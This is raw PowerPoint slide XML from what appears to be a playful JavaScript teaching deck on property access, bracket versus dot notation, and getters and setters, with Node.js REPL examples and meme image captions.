                    <a:pt x="6090378" y="7583"/>
                    <a:pt x="6013554" y="492265"/>
                    <a:pt x="5943600" y="506006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5873646" y="519747"/>
                    <a:pt x="5789951" y="86906"/>
                    <a:pt x="5733738" y="82534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5677525" y="78162"/>
                    <a:pt x="5666282" y="482897"/>
                    <a:pt x="5606321" y="479774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5546360" y="476651"/>
                    <a:pt x="5447675" y="63797"/>
                    <a:pt x="5373974" y="63797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5300273" y="63797"/>
                    <a:pt x="5230943" y="469156"/>
                    <a:pt x="5164112" y="479774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5097281" y="490392"/>
                    <a:pt x="5025453" y="123758"/>
                    <a:pt x="4972987" y="127505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4920521" y="131252"/>
                    <a:pt x="4916149" y="502259"/>
                    <a:pt x="4849318" y="502259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4782487" y="502259"/>
                    <a:pt x="4653197" y="116887"/>
                    <a:pt x="4572000" y="127505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4490803" y="138123"/>
                    <a:pt x="4438962" y="559721"/>
                    <a:pt x="4362138" y="565967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4285314" y="572213"/>
                    <a:pt x="4181632" y="178721"/>
                    <a:pt x="4111053" y="164980"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4040474" y="151239"/>
                    <a:pt x="4002374" y="482896"/>
                    <a:pt x="3938666" y="483521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3874958" y="484146"/>
                    <a:pt x="3806252" y="164980"/>
                    <a:pt x="3728803" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3651354" y="172475"/>
                    <a:pt x="3544550" y="509754"/>
                    <a:pt x="3473971" y="506006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3403392" y="502258"/>
                    <a:pt x="3368415" y="143119"/>
                    <a:pt x="3305331" y="146242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3242247" y="149365"/>
                    <a:pt x="3158553" y="517249"/>
                    <a:pt x="3095469" y="524744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032385" y="532239"/>
                    <a:pt x="2993661" y="198708"/>
                    <a:pt x="2926830" y="191213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2859999" y="183718"/>
                    <a:pt x="2757566" y="487269"/>
                    <a:pt x="2694482" y="479774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2631398" y="472279"/>
                    <a:pt x="2607664" y="138747"/>
                    <a:pt x="2548328" y="146242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2488992" y="153737"/>
                    <a:pt x="2408420" y="520996"/>
                    <a:pt x="2338466" y="524744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2268512" y="528492"/>
                    <a:pt x="2206052" y="161857"/>
                    <a:pt x="2128603" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2051154" y="175598"/>
                    <a:pt x="1933732" y="565967"/>
                    <a:pt x="1873771" y="565967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1813810" y="565967"/>
                    <a:pt x="1842541" y="168728"/>
                    <a:pt x="1768839" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1695137" y="168728"/>
                    <a:pt x="1519003" y="565967"/>
                    <a:pt x="1431561" y="565967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1344119" y="565967"/>
                    <a:pt x="1314138" y="172475"/>
                    <a:pt x="1244184" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1174230" y="164981"/>
                    <a:pt x="1083039" y="539735"/>
                    <a:pt x="1011836" y="543482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940633" y="547230"/>
                    <a:pt x="884420" y="193711"/>
                    <a:pt x="816964" y="191213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="749508" y="188715"/>
                    <a:pt x="677056" y="532864"/>
                    <a:pt x="607102" y="528492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537148" y="524120"/>
                    <a:pt x="470941" y="148116"/>
                    <a:pt x="397239" y="164980"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323537" y="181844"/>
                    <a:pt x="231098" y="635921"/>
                    <a:pt x="164892" y="629675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98685" y="623429"/>
                    <a:pt x="52466" y="144993"/>
                    <a:pt x="0" y="127505"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="15000"/>
                  <a:alpha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access 3</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One last question before we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" strike="sngStrike" dirty="0"/>
              <a:t>abandon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> leave the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> for good…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Why are there 2 ways to access an object property?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>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blobcat.whyNotUseEmojisInYourVariableNames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-HK" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>🫠 </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"I don't know how to type emojis"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat.whyNotUseEmojisInYourVariableNames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-HK" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>🫠 </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"I don't know how to type emojis"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>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                                          ^</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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Uncaught </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SyntaxError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: Invalid or unexpected token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blobcat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whyNotUseEmojisInYourVariableNames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-HK" altLang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>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"I don't know how to type emojis"</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"I don't know how to type emojis"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>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&gt; // Have you tried pressing the Win+. combination?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Property names with unusual characters must use the bracket notation instead of the dot one [1]</a:t>
            </a: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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A37F954D-A3EB-2C72-4440-DCF7AE2403F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4928007"/>
            <a:ext cx="623076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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#dot_notation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2193119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Desmond</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pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>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hehe</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>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_</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hehe</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get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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</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this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>._</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set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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>._</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>val</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8" name="Picture 7" descr="A close up of COMP 2011 lecture notes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81BE7D6-3E01-623E-7749-A33E847565ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="925736" y="2382825"/>
            <a:ext cx="3646264" cy="752714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Desmond with red laser beam over his eyes saying &quot;Please say no&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C88BF9-1EFD-9FC0-69ED-FAED637BE1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4813031" y="1062220"/>
            <a:ext cx="1625970" cy="1625970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="Desmond person in a red robe captioned &quot;A++++&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1E06B8-6491-A8F9-2A95-23C9669B9D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4990872" y="3268295"/>
            <a:ext cx="1270289" cy="1625970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1390627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getter [1] and setter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numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</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desmond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = {</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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</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haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"good guy"</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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"good guy"</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</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haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"no setting me "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>val</a:t>
            </a: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desmond.haha</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good guy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
